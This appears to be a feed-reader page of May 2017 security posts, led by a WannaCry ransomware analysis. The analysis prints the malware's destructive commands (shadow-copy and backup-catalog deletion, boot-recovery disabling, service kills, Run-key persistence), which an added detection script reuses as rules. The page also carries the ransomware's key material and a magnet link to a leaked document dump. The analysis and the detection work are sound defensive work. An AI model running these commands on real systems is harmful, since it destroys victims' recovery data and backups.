d. Tack on extension ".WNCRYT"

11. Run new process taskdl.exe in a new thread

12. Set Up the Decrypter Persistence:

a. Read Configuration File
b. Finds the location of @WanaDecryptor@.exe
c. Create process "taskse.exe @WanaDecryptor@.exe"
d. Set persistence key to run itself on reboot HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
e. CheckTokenMembership, GetComputerName Info
f. Run: cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "<rand>" /t REG_SZ /d "\"tasksche.exe\"" /f
g. Looks for “f.wnry" (what this is for is not clear in my analysis)

 

@WanaDecryptor@.exe Details

MD5: 7bf2b57f2a205768755c07f238fb32cc

13. Runs: @WanaDecryptor@.exe fi

a. Reads config file for Tor Client
b. Runs Tor Client.  Note that I did not drill into the communications deeply during this analysis.  It’s basically connecting to the .onion sites listed above to allow for user payment and tracking. 

14. Creates @WanaDecryptor@.exe persistence and backup

a. Creates lnk file @WanaDecryptor@.exe.lnk via batch script


@echo off
echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
echo SET om = ow.CreateShortcut("@WanaDecryptor@.exe.lnk")>> m.vbs
echo om.TargetPath = "@WanaDecryptor@.exe">> m.vbs
echo om.Save>> m.vbs
cscript.exe  //nologo m.vbs
del m.vbs

b. Write to <randominteger>.bat

1. Execute batch script
2. Delete: del /a %%0

15. Creates Ransom Notes @Please_Read_Me@.txt from "r.wnry"
16. Encrypts files, kills database and email server-related processes if they are running

a. Capture UserName
b. Get Drive Type
c. Runs:

taskkill.exe /f /im Microsoft.Exchange.*

taskkill.exe /f /im MSExchange*

taskkill.exe /f /im sqlserver.exe

taskkill.exe /f /im sqlwriter.exe

taskkill.exe /f /im mysqld.exe

d. Check Free Disk Space
e. Loops through files and encrypts them (See Appendix for the targeted extensions)

17. Runs: @WanaDecryptor@.exe co

a. Writes to .res file compiled by the time decrypted

b. Run Tor service: taskhsvc.exe TaskData\Tor\taskhsvc.exe

18. Runs: cmd.exe /c start /b @WanaDecryptor@.exe vs

a. Deletes the volume shadow copies with the command: Cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete &  bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
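The command lines in steps 4, 12, 16 and 18 are the observable part of this behaviour, and they are what an endpoint sensor sees as process creations. As an added example (not from the original write-up), the script below turns them into detection rules and runs them over a few constructed process-creation records (tab-separated timestamp, host, user, command line; the host names, user names and the benign OneDrive and "vssadmin list" records are made up), then reports which hosts show the destructive, high-severity commands. The chained command from step 18 is split on "&" so each piece is judged on its own, and the Run-key rule is tied to the tasksche.exe value to avoid flagging ordinary startup entries.

```python
"""Detection rules for the destructive and persistence commands listed in the
analysis above, run over constructed process-creation records.  Example code
added to this page, not part of the original write-up; host names, user names
and the benign records are made up."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    fragment: str      # the command fragment that matched


SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3}

# (name, severity, pattern).  Patterns are matched per command fragment, so
# "cmd.exe /c a & b & c" is judged as three separate commands.
RULES = [
    ("shadow-copy-deletion", "high",
     re.compile(r"\b(?:vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete)\b", re.I)),
    ("boot-recovery-disabled", "high",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\b(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("backup-catalog-deleted", "high",
     re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b", re.I)),
    ("run-key-persistence-tasksche", "high",
     re.compile(r'\breg(?:\.exe)?\s+add\s+"?HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\b.*tasksche\.exe', re.I)),
    ("db-mail-service-kill", "medium",
     re.compile(r"\btaskkill(?:\.exe)?\s+/f\s+/im\s+(?:Microsoft\.Exchange|MSExchange|sqlserver|sqlwriter|mysqld)", re.I)),
    ("everyone-full-control", "low",
     re.compile(r"\bicacls(?:\.exe)?\s.*?/grant\s+Everyone:F\b", re.I)),
]


def scan_command(cmdline: str) -> list[Finding]:
    """Return every rule hit for one process command line."""
    hits = []
    for fragment in (p.strip() for p in cmdline.split("&") if p.strip()):
        for name, severity, pattern in RULES:
            if pattern.search(fragment):
                hits.append(Finding(name, severity, fragment))
    return hits


def parse_record(line: str) -> tuple[str, str, str, str]:
    """Record format assumed here: timestamp, host, user, command line, tab-separated."""
    ts, host, user, cmd = line.rstrip("\n").split("\t", 3)
    return ts, host, user, cmd


def scan_log(lines: list[str]) -> list[tuple[str, Finding]]:
    """(host, finding) pairs for every rule hit across the log."""
    results = []
    for line in lines:
        _, host, _, cmd = parse_record(line)
        results.extend((host, f) for f in scan_command(cmd))
    return results


def hosts_at_or_above(lines: list[str], severity: str) -> list[str]:
    """Sorted hosts with at least one finding at the given severity or higher."""
    threshold = SEVERITY_RANK[severity]
    return sorted({h for h, f in scan_log(lines) if SEVERITY_RANK[f.severity] >= threshold})


# Constructed sample records (timestamps, hosts and users are invented).
SAMPLE_LOG = [
    "2017-05-12T13:05:01Z\tWS01\tCORP\\alice\t" + r"cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet",
    "2017-05-12T13:05:03Z\tWS01\tCORP\\alice\t" + r'cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "abcd1234" /t REG_SZ /d "\"tasksche.exe\"" /f',
    "2017-05-12T13:05:04Z\tSQL01\tNT AUTHORITY\\SYSTEM\ttaskkill.exe /f /im sqlserver.exe",
    "2017-05-12T13:05:05Z\tSQL01\tNT AUTHORITY\\SYSTEM\ticacls . /grant Everyone:F /T /C /Q",
    "2017-05-12T09:00:00Z\tADMIN01\tCORP\\bob\tvssadmin list shadows",
    "2017-05-12T09:00:05Z\tADMIN01\tCORP\\bob\t" + r'reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v OneDrive /t REG_SZ /d "C:\Users\bob\OneDrive.exe" /f',
]

if __name__ == "__main__":
    for host, f in scan_log(SAMPLE_LOG):
        print(f"{host:8} {f.severity:6} {f.rule:30} {f.fragment}")
    print("hosts with high-severity findings:", hosts_at_or_above(SAMPLE_LOG, "high"))
```

Only WS01 reaches high severity: the shadow-copy, bcdedit and wbadmin fragments each fire separately, so the single chained command from step 18 produces several findings. SQL01 shows the taskkill and icacls activity alone, which is worth investigating but not conclusive by itself, and the administrator's "vssadmin list shadows" and OneDrive Run entry produce nothing.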

 

Conclusion

Despite its ability to propagate so quickly, the ransomware activities taken by this malware are not particularly interesting or novel.  As I demonstrated in this malware, the killswitch in the execution flow provided a unique opportunity to slow down the ransomware. As security researcher MalwareTech discovered, and Talos described in detail, this malware was programmed to bail out upon a successful connection to that server, which stops the malware altogether.  We should all thank MalwareTech for setting up the sinkhole, which caused this outbreak to slow sooner than it otherwise would have.  

This malware is easy to modify.  As mentioned above, other researchers are already finding variants in the wild.  If you’re running Windows and haven’t patched yet, now’s the time to do it. And while you’re at it, go test your backups to build some confidence that you won’t be forced to choose between paying up or losing data should the worst happen to you or your organization.

 

Appendix

Summary of Files


Zip File (b576ada...31) Contents


 

Extensions to encrypt

.doc,.docx,.docb,.docm,.dot,.dotm,.dotx,.xls,.xlsx,.xlsm,.xlsb,.xlw,.xlt,.xlm,.xlc,.xltx,.xltm,.ppt,.pptx,.pptm,.pot,.pps,.ppsm,.ppsx,.ppam,.potx,.potm,.pst,.ost,.msg,.eml,.edb,.vsd,.vsdx,.txt,.csv,.rtf,.123,.wks,.wk1,.pdf,.dwg,.onetoc2,.snt,.hwp,.602,.sxi,.sti,.sldx,.sldm,.sldm,.vdi,.vmdk,.vmx,.gpg,.aes,.ARC,.PAQ,.bz2,.tbk,.bak,.tar,.tgz,.gz,.7z,.rar,.zip,.backup,.iso,.vcd,.jpeg,.jpg,.bmp,.png,.gif,.raw,.cgm,.tif,.tiff,.nef,.psd,.ai,.svg,.djvu,.m4u,.m3u,.mid,.wma,.flv,.3g2,.mkv,.3gp,.mp4,.mov,.avi,.asf,.mpeg,.vob,.mpg,.wmv,.fla,.swf,.wav,.mp3,.sh,.class,.jar,.java,.rb,.asp,.php,.jsp,.brd,.sch,.dch,.dip,.pl,.vb,.vbs,.ps1,.bat,.cmd,.js,.asm,.h,.pas,.cpp,.c,.cs,.suo,.sln,.ldf,.mdf,.ibd,.myi,.myd,.frm,.odb,.dbf,.db,.mdb,.accdb,.sql,.sqlitedb,.sqlite3,.asc,.lay6,.lay,.mml,.sxm,.otg,.odg,.uop,.std,.sxd,.otp,.odp,.wb2,.slk,.dif,.stc,.sxc,.ots,.ods,.3dm,.max,.3ds,.uot,.stw,.sxw,.ott,.odt,.pem,.p12,.csr,.crt,.key,.pfx,.der 

Public RSA2 Key to Decrypt AES Key (Converted to Base64 for Display)


  

AES Decrypted Key for Decrypting the DLL

BE E1 9B 98 D2 E5 B1 22 11 CE 21 1E EC B1 3D E6

 

Extracting Encrypted AES Key and Encrypted DLL from t.wrny


 

Hard Coded Public Key to Encrypt User Private Key (Converted to Base64 for Display)

BgIAAACkAABSU0ExAAgAAAEAAQB1l0w7hEbeLCr0lahdwM1t2tfUkh4TgjRqcI2PfPcEklV/8aInsp5BrJCAkRiTwrF7rSvz/6/bK1G+HaMn46dXCFq+wR32BPgcvluxZ/vkyNp1AHCxF3AkbAljdKxLCh1xrn+uZbjFhnnFfp+YYExSuSliyyMp7TGRdHt7CyYb8n1nv9p6QNryYU2UpX2tWWutnqM6OcZbbp/Suza19dJl9Sww2MEXva8oAJYgRqctYgMM19B1oAsH6tQfyujZTts48iZ1yxKmiHCb4eoy3PhxclBB5heBaCdCjt/l3qFy2Tv75Z0wEWmSzWAr4tVGPCjPnTBK9625+w+R/i6+GPHO

Dll Decrypt Private Key (Converted to Base64 for Display)

BgIAAACkAABSU0ExAAgAAAEAAQBDK00rBJwK2Z8e2l/tMqnv4c4aUPQV51F77LAnVgVYtPaDybZ3W4BhGByrFNVq/TtwnRM/LiET8eev4/urbkNxJW0dUtYFXxMnniiJ9sqQkwpoxN6Cm6rCggKxGGABYxu8cY2+ZIhe1Q1swZzJATaJyYA3jx2JZ08MsTxhCToCXbhO9YgKn4wKht+R/s2fo6AT0y0wd9HwqNerluVIljcDaWSXBlwnUIyRdmeFOmxqslkSCmHyoe6oJMjksRFt1sz3j0xesFWEgW1gRYQP/N/5J6VSyVsGKKPedAPWx3Jm3L6kHv8glu1RhADMnDZk8oVNzzZg3ciw8ZHbeguD7s/v

Other Files

Name            Description
00000000.eky    User private key encrypted by the Ransomware Public key
00000000.pky    Public Key used for Encrypting Files
00000000.res    Tor/C2 info
00000000.dky    Decryption key received by the Authors

 

Struct for SMB_TRANS2_PKT

Screenshot of Shellcode in SMB1 Trans2 Packet Body

 

15 May 00:46

Global ‘Wana’ Ransomware Outbreak Earned Perpetrators $26,000 So Far

by BrianKrebs

As thousands of organizations work to contain and clean up the mess from this week’s devastating Wana ransomware attack, the fraudsters responsible for releasing the digital contagion are no doubt counting their earnings and congratulating themselves on a job well done. But according to a review of the Bitcoin addresses hard-coded into Wana, it appears the perpetrators of what’s being called the worst ransomware outbreak ever have made little more than USD $26,000 so far from the scam.

Victims of the Wana ransomware will see this lock screen demanding a $300 ransom to unlock all encrypted files.


The Wana ransomware became a global epidemic virtually overnight this week, after criminals started distributing copies of the malware with the help of a security vulnerability in Windows computers that Microsoft patched in March 2017. Infected computers have all their documents and other important user files scrambled with strong encryption, and victims without access to good backups of that data have two choices: Kiss the data goodbye, or pay the ransom — the equivalent of approximately USD $300 worth of the virtual currency Bitcoin.

According to a detailed writeup on the Wana ransomware published Friday by security firm Redsocks, Wana contains three bitcoin payment addresses that are hard-coded into the malware. One of the nice things about Bitcoin is that anyone can view all of the historic transactions tied to a given Bitcoin payment address. As a result, it’s possible to tell how much the criminals at the helm of this crimeware spree have made so far and how many victims have paid the ransom.

A review of the three payment addresses hardcoded into the Wana ransomware strain indicates that these accounts to date have received 100 payments totaling slightly more than 15 Bitcoins — or approximately $26,148 at the current Bitcoin-to-dollars exchange rate.

ANALYSIS

It is possible that the crooks responsible for this attack maintained other Bitcoin addresses that were used to receive payments in connection with this attack, but there is currently no evidence of that. It’s worth noting that the ransom note Wana popped up on victim screens (see screenshot above) included a “Contact Us” feature that may have been used by some victims to communicate directly with the fraudsters. Also, I realize that in many ways USD $26,000 is a great deal of money.

However, I find it depressing to think of the massive financial damage likely wrought by this ransom campaign in exchange for such a comparatively small reward. It’s particularly galling because this attack potentially endangered the lives of many. At least 16 hospitals in the United Kingdom were diverting patients and rescheduling procedures on Friday thanks to the Wana outbreak, meaning the attack may well have hurt people physically (no deaths have been reported so far, thank goodness).

Unfortunately, this glaring disparity is par for the course with cybercrime in general. As I observed on several occasions in my book Spam Nation — which tracked the careers of some of the most successful malware writers and pharmacy pill spammers on the planet — it was often disheartening to see how little money most of those guys made given the sheer amount of digital disease they were pumping out into the Internet on a daily basis.

In fact, very few of these individuals made much money at all, and yet they were responsible for perpetuating a global crime machine that inflicted enormous damage on businesses and consumers. A quote in the book from Stefan Savage, a computer science professor at the University of California, San Diego (UCSD) encapsulates the disparity quite nicely and seems to have aged quite well:

“What’s fascinating about all this is that at the end of the day, we’re not talking about all that much money,” Savage said. “These guys running the pharma programs are not Donald Trumps, yet their activity is going to have real and substantial financial impact on the day-to-day lives of tens of millions of people. In other words, for these guys to make modest riches, we need a multibillion-dollar industry to deal with them.”

15 May 00:46

"WannaCry Ransomware Threat : What we know so far - WEBCAST slides"

by sansdfir
The WannaCry ransomware worm is unprecedented for two reasons. First, it's a ransomware worm. Second, it appears to be using a recently patched exploit that was stolen from NSA to propagate. Jake Williams' firm, Rendition Infosec, has been tracking the use of this exploit since it was publicly released and completed another internet-wide scan of … Continue reading WannaCry Ransomware Threat : What we know so far - WEBCAST slides
15 May 00:42

Quickpost: WannaCry Killswitch Check Is Not Proxy Aware

by Didier Stevens

It looks like #WannaCry’s killswitch check (www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com) is not proxy aware:

Organizations that use proxies will not benefit from the killswitch.

Sample: 5ad4efd90dcde01d26cc6f32f7ce3ce0b4d4951d4b94a19aa097341aff2acaec

I have not tested this in a VM. If someone has, please post a comment with your findings.

Update: I did test the sample, it is not proxy aware. In an environment with an HTTP proxy and no direct connections to the Internet, the sample can not connect to www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com, and it will infect the host.

If I patch the sample to make it proxy aware, it can connect to the site through the proxy, and it does not infect the host.


Quickpost info



15 May 00:42

WannaCry Kill-Switch(ed)? It’s Not Over! WannaCry 2.0 Ransomware Arrives

by noreply@blogger.com (Swati Khandelwal)
Update — After reading this article, if you want to know what has happened so far in the past 4 days and how to protect your computers from WannaCry, read our latest article "WannaCry Ransomware: Everything You Need To Know Immediately."  If you are following the news, by now you might be aware that a security researcher has activated a "Kill Switch" which apparently stopped the WannaCry
15 May 00:41

It’s Not Over, WannaCry 2.0 Ransomware Just Arrived With No ‘Kill-Switch’

by OODA Analyst
“If you are following the news, by now you might be aware that a security researcher has activated a ‘Kill Switch’ to stop WannaCry ransomware from spreading further, but it’s not over, criminals have just launched WannaCry 2.0 with no ‘kill-switch’ functionality. “ Source: It’s Not Over, WannaCry 2.0 Ransomware
15 May 00:41

Quickpost: WannaCry’s Mutex Is MsWinZonesCacheCounterMutexA0 (Digit Zero At The End)

by Didier Stevens

I’ve seen reports that WannaCry uses a mutex with name Global\MsWinZonesCacheCounterMutexA.

The samples I analyzed all use another mutex: Global\MsWinZonesCacheCounterMutexA0. That’s a digit zero at the end.

I have not found a sample that uses mutex Global\MsWinZonesCacheCounterMutexA (e.g. without digit zero at the end).

Update 1: I got confirmation from Costin Raiu from Kaspersky that the mutex is Global\MsWinZonesCacheCounterMutexA0.

Update 2: dynamic analysis with sample 84c82835a5d21bbcf75a61706d8ab549 shows that there are 2 mutexes that can prevent the ransoming of files: MsWinZonesCacheCounterMutexA and Global\MsWinZonesCacheCounterMutexA0. Remark that the Global namespace must be used with mutex MsWinZonesCacheCounterMutexA0, while it may not be used with mutex MsWinZonesCacheCounterMutexA.

 

Remark that the code above contains string “Global\\MsWinZonesCacheCounterMutexA”, but that is not the actual string used for OpenMutexA.

The actual string used for OpenMutexA is created by a sprintf “%s%d” call, and results in “Global\\MsWinZonesCacheCounterMutexA0“, that is “Global\\MsWinZonesCacheCounterMutexA” with a digit 0 (zero) appended.

Mutexes have long been used by malware authors to prevent more than one instance of the malware running on the same machine. An old anti-malware trick consists in the creation of a specific mutex, to prevent the execution of a specific malware.

I’ve seen tools and scripts published to create mutex Global\MsWinZonesCacheCounterMutexA to prevent WannaCry from infecting machines. This will not work for the samples I analyzed.

Samples I disassembled:

7c465ea7bcccf4f94147add808f24629644be11c0ba4823f16e8c19e0090f0ff (contained as a resource in 5ad4efd90dcde01d26cc6f32f7ce3ce0b4d4951d4b94a19aa097341aff2acaec).

86721e64ffbd69aa6944b9672bcabb6d (contained as a resource in 5bef35496fcbdbe841c82f4d1ab8b7c2).

Samples I searched for containing the mutex and sprintf code:

509c41ec97bb81b0567b059aa2f50fe8
5bef35496fcbdbe841c82f4d1ab8b7c2
638f9235d038a0a001d5ea7f5c5dc4ae
7f7ccaa16fb15eb1c7399d422f8363e8
84c82835a5d21bbcf75a61706d8ab549
86721e64ffbd69aa6944b9672bcabb6d
d6114ba5f10ad67a4131ab72531f02da
db349b97c37d22f5ea1d1841e3c89eb4
f107a717f76f4f910ae9cb4dc5290594

If you have a sample that actually uses mutex Global\\MsWinZonesCacheCounterMutexA and not mutex Global\\MsWinZonesCacheCounterMutexA0 (e.g. with digit zero appended), please post a comment with the hash of your sample.

 


Quickpost info



08 May 18:21

Hacker dumps, magnet links, and you

by Robert Graham
In an excellent post pointing out Wikileaks deserves none of the credit given them in the #MacronLeaks, the author erroneously stated that after Archive.org took down the files, that Wikileaks provided links to a second archive. This is not true. Instead, Wikileaks simply pointed to what's known as "magnet links" of the first archive. Understanding magnet links is critical to understanding all these links and dumps, so I thought I'd describe them.

The tl;dr version is this: anything published via BitTorrent has a matching "magnet link" address, and the contents can still be reached via magnet links when the original publisher goes away.


In this case, the leaker uploaded to "archive.org", a popular Internet archiving resource. This website allows you to either download files directly, which is slow, or via peer-to-peer using BitTorrent, which is fast. As you know, BitTorrent works by all the downloaders exchanging pieces with each other, rather than getting them from the server. I give you a piece you don't have, in exchange for a piece I don't have.

BitTorrent, though, still requires a "torrent" (a ~30k file that lists all the pieces) and a "tracker" (http://bt1.archive.org:6969/announce) that keeps a list of all the peers so they can find each other. The tracker also makes sure that every piece is available from at least one peer.

When "archive.org" realized what was happening, they deleted the leaked files, the torrent, and the tracking.

However, BitTorrent has another feature called "magnet links". This is simply the "hash" of the "torrent" file contents, which looks something like "06724742e86176c0ec82e294d299fba4aa28901a". (This isn't a hash of the entire file, but just the important parts, such as the filenames and sizes).

Along with downloading files, BitTorrent software on your computer also participates in a "distributed hash" network. When using a torrent file to download, your BitTorrent software still tells other random BitTorrent clients about the hash. Knowledge of this hash thus spreads throughout the BitTorrent world. It's only 16 bytes in size, so the average BitTorrent client can keep track of millions of such hashes while consuming very little memory or bandwidth.

If somebody decides they want to download the BitTorrent with that hash, they broadcast that request throughout this "distributed hash" network until they find one or more people with the full torrent. They then get the torrent description file from them, and also a list of peers in the "swarm" who are downloading the file.

Thus, when the original torrent description file, the tracker, and original copy goes away, you can still locate the swarm of downloaders through this hash. As long as all the individual pieces exist in the swarm, you can still successfully download the original file.

In this case, one of the leaked documents was a 2.3 gigabyte file called "langannerch.rar". The torrent description file called "langanerch_archive.torrent" is 26 kilobytes in size. The hash (magnet link) is 16 bytes in size, written "magnet:?xt=urn:btih:06724742e86176c0ec82e294d299fba4aa28901a". If you've got BitTorrent software installed and click on the link, you'll join the swarm and start downloading the file, even though the original torrent/tracker/files have gone away.

According to my BitTorrent client, there are currently 108 people in the swarm downloading this file world-wide. I'm currently connected to 11 of them. Most of them appear to be located in France.

Looking at the General tab, I see that "availability" is 2.95. That means there exist 2.95 complete copies of the download. In other words, if there are 20 pieces, it means that for one of the pieces in the swarm, only 2 people have it. This is dangerously small -- if those two people leave the network, then a complete copy of the dump will no longer exist in the swarm, and it'll be impossible to download it all.

Such dumps can remain popular enough for years after the original tracker/torrent has disappeared, but at some point, a critical piece disappears, and it becomes impossible for anybody to download more than 99.95%, with everyone in the swarm waiting for that last piece. If you read this blogpost 6 months from now, you are likely to see 10 people in the swarm, all stuck at 99.95% complete.

Conclusion

The upshot of this is that it's hard censoring BitTorrent, because all torrents also exist as magnet links. It took only a couple hours for Archive.org to take down the tracker/torrents/files, but after complete downloads were out in the swarm, all anybody needed was the hash of the original torrent to create a magnet link to the data. Those magnet links had already been published by many people. The Wikileaks tweet that linked to them was fairly late, all things considered, other people had already published them.
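As an added example (not part of Robert Graham's post), the script below builds a small single-file torrent from constructed metadata, computes its infohash, the SHA-1 of the raw bencoded "info" dictionary, which is the 40-hex-character value carried in the magnet link quoted above, and forms the magnet URI. It also shows why the link outlives the tracker: swapping the announce URL leaves the infohash unchanged, because the tracker sits outside the "info" dictionary, while renaming the file changes it. The tracker URLs, file name and piece hashes are placeholders.

```python
"""Infohash and magnet link from torrent metadata.  Example code added to this
page, not part of the original post; the torrent below is constructed with
placeholder tracker URLs, file name and piece hashes."""
import hashlib
from urllib.parse import quote


def bencode(value) -> bytes:
    """Encode int / bytes / str / list / dict as bencode; dict keys are sorted as BEP 3 requires."""
    if isinstance(value, bool):
        raise TypeError("bool is not a bencode type")
    if isinstance(value, int):
        return b"i%de" % value
    if isinstance(value, str):
        value = value.encode("utf-8")
    if isinstance(value, (bytes, bytearray)):
        return b"%d:" % len(value) + bytes(value)
    if isinstance(value, list):
        return b"l" + b"".join(bencode(v) for v in value) + b"e"
    if isinstance(value, dict):
        items = sorted((k.encode("utf-8") if isinstance(k, str) else bytes(k), v)
                       for k, v in value.items())
        return b"d" + b"".join(bencode(k) + bencode(v) for k, v in items) + b"e"
    raise TypeError(f"cannot bencode {type(value).__name__}")


def _bdecode_at(data: bytes, i: int):
    """Decode one value starting at offset i; return (value, offset after it)."""
    c = data[i:i + 1]
    if c == b"i":
        end = data.index(b"e", i)
        return int(data[i + 1:end]), end + 1
    if c in (b"l", b"d"):
        items, i = [], i + 1
        while data[i:i + 1] != b"e":
            v, i = _bdecode_at(data, i)
            items.append(v)
        if c == b"l":
            return items, i + 1
        return dict(zip(items[0::2], items[1::2])), i + 1
    if c.isdigit():
        colon = data.index(b":", i)
        n = int(data[i:colon])
        return data[colon + 1:colon + 1 + n], colon + 1 + n
    raise ValueError(f"bad bencode at offset {i}")


def bdecode(data: bytes):
    value, end = _bdecode_at(data, 0)
    if end != len(data):
        raise ValueError("trailing data after bencoded value")
    return value


def info_hash(torrent: bytes) -> str:
    """SHA-1 over the raw bytes of the 'info' dictionary, as BitTorrent clients compute it."""
    if torrent[:1] != b"d":
        raise ValueError("torrent metadata must be a dictionary")
    i = 1
    while torrent[i:i + 1] != b"e":
        key, i = _bdecode_at(torrent, i)
        start = i
        _, i = _bdecode_at(torrent, i)
        if key == b"info":
            return hashlib.sha1(torrent[start:i]).hexdigest()
    raise ValueError("no info dictionary")


def magnet_link(torrent: bytes) -> str:
    """magnet URI with the infohash (xt) and display name (dn)."""
    name = bdecode(torrent)[b"info"][b"name"].decode("utf-8")
    return f"magnet:?xt=urn:btih:{info_hash(torrent)}&dn={quote(name)}"


def make_torrent(name: str, length: int, piece_length: int, pieces: bytes, announce: str) -> bytes:
    """Single-file torrent metadata (constructed sample values)."""
    info = {"name": name, "length": length, "piece length": piece_length, "pieces": pieces}
    return bencode({"announce": announce, "info": info})


PIECE_LEN = 262144
# Three fake 20-byte piece hashes; a multi-gigabyte file would carry thousands.
PIECES = b"".join(hashlib.sha1(bytes([i]) * PIECE_LEN).digest() for i in range(3))
T_ORIG = make_torrent("sample_archive.rar", 3 * PIECE_LEN, PIECE_LEN, PIECES, "http://tracker.example/announce")
T_NEW_TRACKER = make_torrent("sample_archive.rar", 3 * PIECE_LEN, PIECE_LEN, PIECES, "http://other.example/announce")
T_RENAMED = make_torrent("renamed.rar", 3 * PIECE_LEN, PIECE_LEN, PIECES, "http://tracker.example/announce")

if __name__ == "__main__":
    print(magnet_link(T_ORIG))
    print("same content, new tracker:", info_hash(T_NEW_TRACKER) == info_hash(T_ORIG))
    print("renamed file:", info_hash(T_RENAMED) == info_hash(T_ORIG))
```

info_hash slices the raw bytes of the "info" value rather than re-encoding the decoded dictionary, which is what clients do and what makes the hash stable even for torrent files whose encoder did not sort keys canonically. Anything outside that dictionary, the announce URL included, can change or disappear without altering the identifier the swarm is keyed on.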

08 May 18:19

Wormable Windows Zero Day Reported to Microsoft

by Michael Mimoso
Google Project Zero researchers Tavis Ormandy and Natalie Silvanovich found a remotely exploitable Windows vulnerability that Ormandy called the worst in recent memory.